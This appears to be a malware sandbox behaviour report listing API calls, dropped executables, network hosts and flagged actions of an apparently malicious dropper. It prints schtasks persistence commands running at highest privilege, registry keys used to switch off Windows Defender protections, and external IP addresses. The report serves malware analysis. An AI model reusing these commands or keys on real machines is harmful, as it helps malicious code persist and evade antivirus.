filepath: C:\Users\test22\Pictures\Adobe Films\Ehb3TX09sP7PC0g9ewmGExxA.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\01NWJ3EqrrXXQcofclOmpgme.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\01NWJ3EqrrXXQcofclOmpgme.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\301tY1t7qg8_zDCV75DGJBHH.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\301tY1t7qg8_zDCV75DGJBHH.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\xMRgMWwvt1Js2S4aChs4n12H.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\xMRgMWwvt1Js2S4aChs4n12H.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\4dB197_1l7OerQHV9HHywWV_.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\4dB197_1l7OerQHV9HHywWV_.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\xETOXMkcQToHPFfFUFdC0rZ7.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\xETOXMkcQToHPFfFUFdC0rZ7.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\d78LyqpVrYNmErU4VFpgMs_C.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\d78LyqpVrYNmErU4VFpgMs_C.exe
1 1 0

ShellExecuteExW

show_type: 0
filepath_r: C:\Users\test22\Pictures//Adobe Films\82YG_xkSvDww7zcrD21MLhC8.exe
parameters:
filepath: C:\Users\test22\Pictures\Adobe Films\82YG_xkSvDww7zcrD21MLhC8.exe
1 1 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc0010
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc0024
1 1 0

InternetReadFile

request_handle: 0x00cc0034
1 1 0

InternetReadFile

request_handle: 0x00cc003c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0

InternetReadFile

request_handle: 0x00cc000c
1 1 0
process ww_testll_0211_single.exe
process zz_8wjnwjcywe8dtxxwfai7o.exe
process egqradmp6vvhibhfuato690f.exe
process 301ty1t7qg8_zdcv75dgjbhh.exe
Time & API Arguments Status Return Repeated

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0

Process32NextW

snapshot_handle: 0x0000000000000028
process_name: eg吐眞
process_identifier: 2488
0 0
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
host 212.192.241.62
host 45.133.1.107
host 45.133.1.182
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
process ww_testLL_0211_single.exe useragent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
process ww_testLL_0211_single.exe useragent Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
process 82YG_xkSvDww7zcrD21MLhC8.tmp useragent InnoDownloadPlugin/1.5
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
cmdline schtasks /create /f /RU "test22" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableRoutinelyTakingAction
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRawWriteNotification
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring
description attempts to modify windows defender policies registry HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection
dead_host 192.168.56.103:49268
dead_host 192.168.56.103:49290
dead_host 192.168.56.103:49227